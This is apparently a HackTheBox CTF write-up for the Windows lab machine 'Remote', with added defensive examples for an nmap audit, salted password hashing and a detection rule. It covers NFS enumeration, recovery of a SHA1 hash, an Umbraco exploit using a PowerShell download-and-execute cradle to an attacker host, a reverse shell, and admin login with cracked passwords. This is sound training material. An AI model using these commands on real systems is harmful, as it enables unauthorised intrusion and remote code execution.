HackTheBox — Remote

Summary

Remote is an easy Windows machine with the IP address 10.10.10.180.

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.180
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-29 12:52 EET
Nmap scan report for 10.10.10.180
Host is up (0.076s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3,4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5m03s, deviation: 0s, median: 5m03s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-29 12:59:04
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.53 seconds
root@strike:~#

The scan shows rpcbind, which looked interesting, so I tried to get more information from it with nmap's nfs-showmount script:

root@strike:~/Desktop/HTB/Windows-EX# nmap -sV --script=nfs-showmount -oN remote.nfs 10.10.10.180
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-29 13:59 EET
Nmap scan report for 10.10.10.180
Host is up (0.10s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp open rpcbind 2-4 (RPC #100000)
| nfs-showmount:
|_ /site_backups
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3,4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
| nfs-showmount:
|_ /site_backups
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.19 seconds
root@strike:~/Desktop/HTB/Windows-EX#
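The scan output above already contains the three exposures that made this box possible: anonymous FTP, an NFS export reachable from the network, and SMB signing that is enabled but not required. The following script is an added example, not part of the write-up; it parses nmap's normal (-oN) output and turns those script results into findings a defender can ticket. SAMPLE is an excerpt of the scan output on this page; the parser, the rule names and the finding format are this example's own.

```python
"""Audit nmap normal output (-oN) for the exposures seen in the scan above.

Added example, not part of the write-up: it parses the report format nmap
prints and turns NSE script results into findings a defender would act on
(anonymous FTP, NFS exports reachable from the network, SMB signing not
required). SAMPLE is an excerpt of the scan output on this page; the
parser, the rule names and the finding format are this example's own.
"""
import re

SAMPLE = """\
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp open rpcbind 2-4 (RPC #100000)
| nfs-showmount:
|_ /site_backups
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
"""

# "21/tcp open ftp Microsoft ftpd" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_report(text):
    """Return one dict per port plus one pseudo-entry for host scripts.

    NSE script lines ("| ..." / "|_ ...") are attached to the port line that
    precedes them, with the leading pipe/underscore decoration removed.
    """
    entries, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5) or "", "scripts": []}
            entries.append(current)
        elif line.startswith("Host script results"):
            current = {"port": None, "proto": None, "state": None,
                       "service": "host", "version": "", "scripts": []}
            entries.append(current)
        elif line.startswith("|") and current is not None:
            current["scripts"].append(line.lstrip("|_ ").rstrip())
    return entries


def audit(entries):
    """Map parsed entries to (port, finding) tuples; port is None for host scripts."""
    findings = []
    for e in entries:
        scripts = e["scripts"]
        text = "\n".join(scripts)
        if e["service"] == "ftp" and "Anonymous FTP login allowed" in text:
            findings.append((e["port"], "anonymous FTP login allowed"))
        if "nfs-showmount:" in text:
            # Every line under nfs-showmount that starts with "/" is an export path.
            for export in (s for s in scripts if s.startswith("/")):
                findings.append((e["port"], f"NFS export reachable: {export}"))
        if e["service"] in ("nfs", "mountd") and e["state"] == "open":
            findings.append((e["port"], f"{e['service']} exposed to the network"))
        if "Message signing enabled but not required" in text:
            findings.append((e["port"], "SMB signing not required"))
    return findings


if __name__ == "__main__":
    for port, finding in audit(parse_report(SAMPLE)):
        where = f"port {port}" if port is not None else "host"
        print(f"[{where}] {finding}")
```

Run against a real report, the same parser works on the full output of `nmap -sC -sV -oN remote.nmap <host>`; the point of keeping the rules in one function is that each finding maps to a concrete fix (disable anonymous FTP, restrict or remove the export, require SMB signing).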

Next, we need to look at the NFS export named site_backups, so we mount it:

root@strike:~/Desktop/HTB/Windows-EX# sudo mount -o nfsvers=4 -t nfs remote.htb:/site_backups /mnt

Inside the backup there is an interesting file, Umbraco.sdf:

root@strike:~# strings Umbraco.sdf | grep admin

The output:

adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50

Exploitation

After cracking the SHA1 hash, we get the username admin@htb.local and the password baconandcheese.
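The record pulled from Umbraco.sdf says `{"hashAlgorithm":"SHA1"}` next to a 40-character hex digest, which is why a wordlist recovers the password so quickly: unsalted SHA1 is deterministic and fast, so one precomputed list checks every user at once. The code below is an added example, not from the write-up, contrasting that scheme with a salted, iterated hash and a constant-time check. The function names and the iteration count are this example's own choices.

```python
"""Unsalted SHA1 (the scheme recorded in the backup above) versus a salted,
iterated password hash.

Added example, not from the write-up. Unsalted SHA1 is deterministic, so two
accounts with the same password store the same digest and a single
precomputed wordlist matches both. The PBKDF2 functions are the alternative;
their names and PBKDF2_ITERATIONS are this example's own choices.
"""
import hashlib
import hmac
import os
from typing import Optional


def legacy_sha1_hex(password: str) -> str:
    """The weak scheme: plain SHA1 of the password, no salt, one iteration."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


PBKDF2_ITERATIONS = 600_000  # assumption: size this to your own hardware


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, serialised as algo$iterations$salt$digest.

    A fresh 16-byte random salt is drawn per password unless one is supplied.
    """
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                                 PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    # Constructed demo: two accounts sharing a password.
    shared = "correct horse battery staple"
    print("legacy digests equal:",
          legacy_sha1_hex(shared) == legacy_sha1_hex(shared))      # True: one lookup hits both
    a, b = hash_password(shared), hash_password(shared)
    print("pbkdf2 records equal:", a == b)                          # False: per-user salt
    print("verify ok:", verify_password(shared, a), verify_password("wrong", a))
```

The salt removes the shared-digest problem and the iteration count removes the speed advantage; neither helps once a backup with the records has already left the host, so the defensive response to a leak like this one is rotation of every credential in the file, not just a stronger hash for the next one.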

./exploit.py -u admin@htb.local -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.116/Azure-ADConnect.ps1')"

Now, using Metasploit to catch the shell:

msf5 exploit(multi/handler) > set payload payload/windows/x64/shell_reverse_tcp
payload => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.15.116
lhost => 10.10.15.116
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.15.116:8888
msf5 exploit(multi/handler) > [*] Command shell session 1 opened (10.10.15.116:8888 -> 10.10.10.180:49697) at 2020-05-02
session -i 1
msf exploit(multi/handler) > session -i 1
[*] Starting interaction with 1...

PS C:\windows\system32\inetsrv>

We get the user flag!
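The shell above lands in C:\windows\system32\inetsrv with a PowerShell download cradle as its command line, which is the process-creation pattern a web-application RCE leaves in the logs. The following is an added example, not from the write-up: a small detection pass over Sysmon-style process creation records (fields Image, ParentImage, CommandLine). The three SAMPLE_EVENTS are constructed; the first reuses the cradle from the command above and assumes it was spawned by the IIS worker process w3wp.exe, which is an assumption consistent with the inetsrv working directory but not stated on the page. Rule names are this example's own.

```python
"""Flag the process-creation pattern behind the shell above.

Added example, not from the write-up. SAMPLE_EVENTS are constructed records
in the shape of Sysmon Event ID 1 (process creation); event 1 reuses the
download cradle from the write-up and assumes the IIS worker (w3wp.exe) as
its parent. Rule names are this example's own.
"""
import re
from pathlib import PureWindowsPath

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

SAMPLE_EVENTS = [
    {"id": 1,  # assumed parent: IIS worker process
     "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "Image": PS,
     "CommandLine": "powershell.exe IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://10.10.15.116/Azure-ADConnect.ps1')"},
    {"id": 2,  # constructed benign admin activity
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"},
    {"id": 3,  # constructed: hidden window plus an encoded command (payload is filler)
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "Image": PS,
     "CommandLine": "powershell.exe -NoP -w hidden -enc AAAAAAAAAAAAAAAAAAAAAAAA"},
]

WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Both halves of a cradle are checked separately so either operand order matches.
IEX_RE = re.compile(r"(?i)\b(IEX|Invoke-Expression)\b")
DOWNLOAD_RE = re.compile(
    r"(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod)")
# -e / -ec / -enc / -encodedcommand followed by a base64-looking blob
ENCODED_RE = re.compile(r"(?i)\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}")


def match_rules(event):
    """Return the list of rule names a single process-creation record trips."""
    hits = []
    image = PureWindowsPath(event["Image"]).name.lower()
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    cmd = event["CommandLine"]
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("web-worker-spawned-shell")
    if IEX_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
        hits.append("powershell-download-cradle")
    if ENCODED_RE.search(cmd):
        hits.append("powershell-encoded-command")
    return hits


def detect(events):
    """Map event id -> rule hits, keeping only events that tripped something."""
    alerts = {}
    for event in events:
        hits = match_rules(event)
        if hits:
            alerts[event["id"]] = hits
    return alerts


if __name__ == "__main__":
    for event_id, hits in detect(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(hits)}")
```

The parent/child rule is the durable one: a web server worker has no business starting a shell, regardless of what the command line says, and it keeps firing when the cradle is obfuscated enough to slip past the string checks.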

Privilege Escalation

After some searching, I found the administrator credentials in a secret file: username administrator and password !R3m0te!. We can connect using the evil-winrm.rb tool:

root@strike:~/Desktop/HTB/Windows-EX/evil-winrm# ./evil-winrm.rb -i 10.10.10.180 -u administrator -p '!R3m0te!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/29/2020 6:23 AM 34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop>

We get the root flag!

If you learned anything useful from this write-up, respect me on HackTheBox.

Thanks for your time!

Ahmed Samir
CTFer | Computer Science Student